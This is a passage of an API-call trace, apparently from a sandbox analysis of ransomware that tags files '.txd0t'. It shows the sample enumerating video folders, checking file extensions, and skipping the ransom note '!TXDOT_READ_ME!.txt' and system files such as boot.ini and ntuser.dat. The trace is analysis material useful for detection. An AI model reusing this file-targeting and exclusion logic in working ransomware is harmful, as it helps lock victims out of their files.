ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x52e6b586, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52e6b586, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.929] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.929] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.929] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0119.929] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\" [0119.929] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\!TXDOT_READ_ME!.txt" [0119.929] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.929] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.929] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.929] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.929] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.929] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.929] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.929] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.929] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.929] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.929] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.929] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.929] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.929] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.929] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.929] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.929] FindNextFileW (in: hFindFile=0xec1b70, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8012ea60, ftCreationTime.dwHighDateTime=0x1d5efb5, ftLastAccessTime.dwLowDateTime=0x9eab00a0, ftLastAccessTime.dwHighDateTime=0x1d5f0ed, ftLastWriteTime.dwLowDateTime=0x52e6b586, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4ca7, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="JifxRs4kGA26s8ZB.swf.txd0t", cAlternateFileName="JIFXRS~1.TXD")) returned 1 [0119.929] StrCmpW (psz1="JifxRs4kGA26s8ZB.swf.txd0t", psz2=".") returned 1 [0119.929] StrCmpW (psz1="JifxRs4kGA26s8ZB.swf.txd0t", psz2="..") returned 1 [0119.929] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0119.929] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\" [0119.929] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\", psz2="JifxRs4kGA26s8ZB.swf.txd0t", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\JifxRs4kGA26s8ZB.swf.txd0t" [0119.929] PathFindExtensionW (pszPath="JifxRs4kGA26s8ZB.swf.txd0t") returned=".txd0t" [0119.929] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.929] FindNextFileW (in: hFindFile=0xec1b70, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34842840, ftCreationTime.dwHighDateTime=0x1d5f094, ftLastAccessTime.dwLowDateTime=0xa69c2fe0, ftLastAccessTime.dwHighDateTime=0x1d5e25c, ftLastWriteTime.dwLowDateTime=0x52e91693, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xe756, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="smX5XObO64h XQO8UV.avi.txd0t", cAlternateFileName="SMX5XO~1.TXD")) returned 1 [0119.930] StrCmpW (psz1="smX5XObO64h XQO8UV.avi.txd0t", psz2=".") returned 1 [0119.930] StrCmpW (psz1="smX5XObO64h XQO8UV.avi.txd0t", psz2="..") returned 1 [0119.930] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0119.930] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\" [0119.930] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\", psz2="smX5XObO64h XQO8UV.avi.txd0t", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\smX5XObO64h XQO8UV.avi.txd0t" [0119.930] PathFindExtensionW (pszPath="smX5XObO64h XQO8UV.avi.txd0t") returned=".txd0t" [0119.930] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.930] FindNextFileW (in: hFindFile=0xec1b70, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83e2e620, ftCreationTime.dwHighDateTime=0x1d5ef5d, ftLastAccessTime.dwLowDateTime=0x9f718290, ftLastAccessTime.dwHighDateTime=0x1d5f0b9, ftLastWriteTime.dwLowDateTime=0x52e91693, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1f4f, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="vH3psvYnWA.swf.txd0t", cAlternateFileName="VH3PSV~1.TXD")) returned 1 [0119.930] StrCmpW (psz1="vH3psvYnWA.swf.txd0t", psz2=".") returned 1 [0119.930] StrCmpW (psz1="vH3psvYnWA.swf.txd0t", psz2="..") returned 1 [0119.930] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R" [0119.930] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R", psz2="\\", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\" [0119.930] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\", psz2="vH3psvYnWA.swf.txd0t", cchMax=1148 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0ll0qUCYfiYHKHKER R\\vH3psvYnWA.swf.txd0t" [0119.930] PathFindExtensionW (pszPath="vH3psvYnWA.swf.txd0t") returned=".txd0t" [0119.930] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.930] FindNextFileW (in: hFindFile=0xec1b70, lpFindFileData=0x599e630 | out: lpFindFileData=0x599e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83e2e620, ftCreationTime.dwHighDateTime=0x1d5ef5d, ftLastAccessTime.dwLowDateTime=0x9f718290, ftLastAccessTime.dwHighDateTime=0x1d5f0b9, ftLastWriteTime.dwLowDateTime=0x52e91693, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1f4f, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="vH3psvYnWA.swf.txd0t", cAlternateFileName="VH3PSV~1.TXD")) returned 0 [0119.930] FindClose (in: hFindFile=0xec1b70 | out: hFindFile=0xec1b70) returned 1 [0119.930] GetProcessHeap () returned 0xe30000 [0119.930] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x680dae8 | out: hHeap=0xe30000) returned 1 [0119.930] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7319f60, ftCreationTime.dwHighDateTime=0x1d5e637, ftLastAccessTime.dwLowDateTime=0xdafb33b0, ftLastAccessTime.dwHighDateTime=0x1d5ef47, ftLastWriteTime.dwLowDateTime=0x52eb798f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x136ed, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="0qq-2JELVv.avi.txd0t", cAlternateFileName="0QQ-2J~1.TXD")) returned 1 [0119.930] StrCmpW (psz1="0qq-2JELVv.avi.txd0t", psz2=".") returned 1 [0119.930] StrCmpW (psz1="0qq-2JELVv.avi.txd0t", psz2="..") returned 1 [0119.930] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0119.930] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0119.930] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="0qq-2JELVv.avi.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\0qq-2JELVv.avi.txd0t" [0119.930] PathFindExtensionW (pszPath="0qq-2JELVv.avi.txd0t") returned=".txd0t" [0119.930] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.930] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfee27b90, ftCreationTime.dwHighDateTime=0x1d5edca, ftLastAccessTime.dwLowDateTime=0x76781420, ftLastAccessTime.dwHighDateTime=0x1d5ecbe, ftLastWriteTime.dwLowDateTime=0x52f50403, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xddf4, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="fR4 C.mp4.txd0t", cAlternateFileName="FR4CMP~1.TXD")) returned 1 [0119.930] StrCmpW (psz1="fR4 C.mp4.txd0t", psz2=".") returned 1 [0119.930] StrCmpW (psz1="fR4 C.mp4.txd0t", psz2="..") returned 1 [0119.930] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0119.930] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0119.931] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="fR4 C.mp4.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\fR4 C.mp4.txd0t" [0119.931] PathFindExtensionW (pszPath="fR4 C.mp4.txd0t") returned=".txd0t" [0119.931] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.931] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7925b570, ftCreationTime.dwHighDateTime=0x1d5ed62, ftLastAccessTime.dwLowDateTime=0x1620ff10, ftLastAccessTime.dwHighDateTime=0x1d5e624, ftLastWriteTime.dwLowDateTime=0x52f7676d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf41f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="I8mA7.swf.txd0t", cAlternateFileName="I8MA7S~1.TXD")) returned 1 [0119.931] StrCmpW (psz1="I8mA7.swf.txd0t", psz2=".") returned 1 [0119.931] StrCmpW (psz1="I8mA7.swf.txd0t", psz2="..") returned 1 [0119.931] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0119.931] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0119.931] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="I8mA7.swf.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\I8mA7.swf.txd0t" [0119.931] PathFindExtensionW (pszPath="I8mA7.swf.txd0t") returned=".txd0t" [0119.931] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.931] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bd7c1d0, ftCreationTime.dwHighDateTime=0x1d5e0d3, ftLastAccessTime.dwLowDateTime=0xa1909100, ftLastAccessTime.dwHighDateTime=0x1d5f0c4, ftLastWriteTime.dwLowDateTime=0x52f7676d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3388, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="iGBmnx.swf.txd0t", cAlternateFileName="IGBMNX~1.TXD")) returned 1 [0119.931] StrCmpW (psz1="iGBmnx.swf.txd0t", psz2=".") returned 1 [0119.931] StrCmpW (psz1="iGBmnx.swf.txd0t", psz2="..") returned 1 [0119.931] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0119.931] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0119.931] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="iGBmnx.swf.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\iGBmnx.swf.txd0t" [0119.931] PathFindExtensionW (pszPath="iGBmnx.swf.txd0t") returned=".txd0t" [0119.931] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.931] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b149190, ftCreationTime.dwHighDateTime=0x1d5f129, ftLastAccessTime.dwLowDateTime=0x9bf61aa0, ftLastAccessTime.dwHighDateTime=0x1d5e6f9, ftLastWriteTime.dwLowDateTime=0x52f9c7a7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xbdaf, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="IWWrfzZp12CtwW5GR.mkv.txd0t", cAlternateFileName="IWWRFZ~1.TXD")) returned 1 [0119.931] StrCmpW (psz1="IWWrfzZp12CtwW5GR.mkv.txd0t", psz2=".") returned 1 [0119.931] StrCmpW (psz1="IWWrfzZp12CtwW5GR.mkv.txd0t", psz2="..") returned 1 [0119.931] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0119.931] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0119.931] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="IWWrfzZp12CtwW5GR.mkv.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\IWWrfzZp12CtwW5GR.mkv.txd0t" [0119.931] PathFindExtensionW (pszPath="IWWrfzZp12CtwW5GR.mkv.txd0t") returned=".txd0t" [0119.931] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.931] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6ddc5a0, ftCreationTime.dwHighDateTime=0x1d5e765, ftLastAccessTime.dwLowDateTime=0xeaa5be10, ftLastAccessTime.dwHighDateTime=0x1d5e886, ftLastWriteTime.dwLowDateTime=0x52fc2964, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf533, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="LISQrmwmwFkmeV9a6dun.mp4.txd0t", cAlternateFileName="LISQRM~1.TXD")) returned 1 [0119.931] StrCmpW (psz1="LISQrmwmwFkmeV9a6dun.mp4.txd0t", psz2=".") returned 1 [0119.931] StrCmpW (psz1="LISQrmwmwFkmeV9a6dun.mp4.txd0t", psz2="..") returned 1 [0119.931] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0119.931] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0119.931] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="LISQrmwmwFkmeV9a6dun.mp4.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\LISQrmwmwFkmeV9a6dun.mp4.txd0t" [0119.931] PathFindExtensionW (pszPath="LISQrmwmwFkmeV9a6dun.mp4.txd0t") returned=".txd0t" [0119.932] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.932] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce00c6e0, ftCreationTime.dwHighDateTime=0x1d5e20c, ftLastAccessTime.dwLowDateTime=0x40bd89b0, ftLastAccessTime.dwHighDateTime=0x1d5ebe1, ftLastWriteTime.dwLowDateTime=0x52fc2964, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcde3, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="MTVtI3u5U.mkv.txd0t", cAlternateFileName="MTVTI3~1.TXD")) returned 1 [0119.932] StrCmpW (psz1="MTVtI3u5U.mkv.txd0t", psz2=".") returned 1 [0119.932] StrCmpW (psz1="MTVtI3u5U.mkv.txd0t", psz2="..") returned 1 [0119.932] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0119.932] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0119.932] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="MTVtI3u5U.mkv.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\MTVtI3u5U.mkv.txd0t" [0119.932] PathFindExtensionW (pszPath="MTVtI3u5U.mkv.txd0t") returned=".txd0t" [0119.932] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.932] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7046e160, ftCreationTime.dwHighDateTime=0x1d5ef3b, ftLastAccessTime.dwLowDateTime=0x9d2b7320, ftLastAccessTime.dwHighDateTime=0x1d5e8b6, ftLastWriteTime.dwLowDateTime=0x52fe8c69, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x37c0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="mZX-jxKKh.mkv.txd0t", cAlternateFileName="MZX-JX~1.TXD")) returned 1 [0119.932] StrCmpW (psz1="mZX-jxKKh.mkv.txd0t", psz2=".") returned 1 [0119.932] StrCmpW (psz1="mZX-jxKKh.mkv.txd0t", psz2="..") returned 1 [0119.932] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0119.932] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0119.932] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="mZX-jxKKh.mkv.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\mZX-jxKKh.mkv.txd0t" [0119.932] PathFindExtensionW (pszPath="mZX-jxKKh.mkv.txd0t") returned=".txd0t" [0119.932] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.932] FindNextFileW (in: hFindFile=0xec1eb0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc450e690, ftCreationTime.dwHighDateTime=0x1d5eb8d, 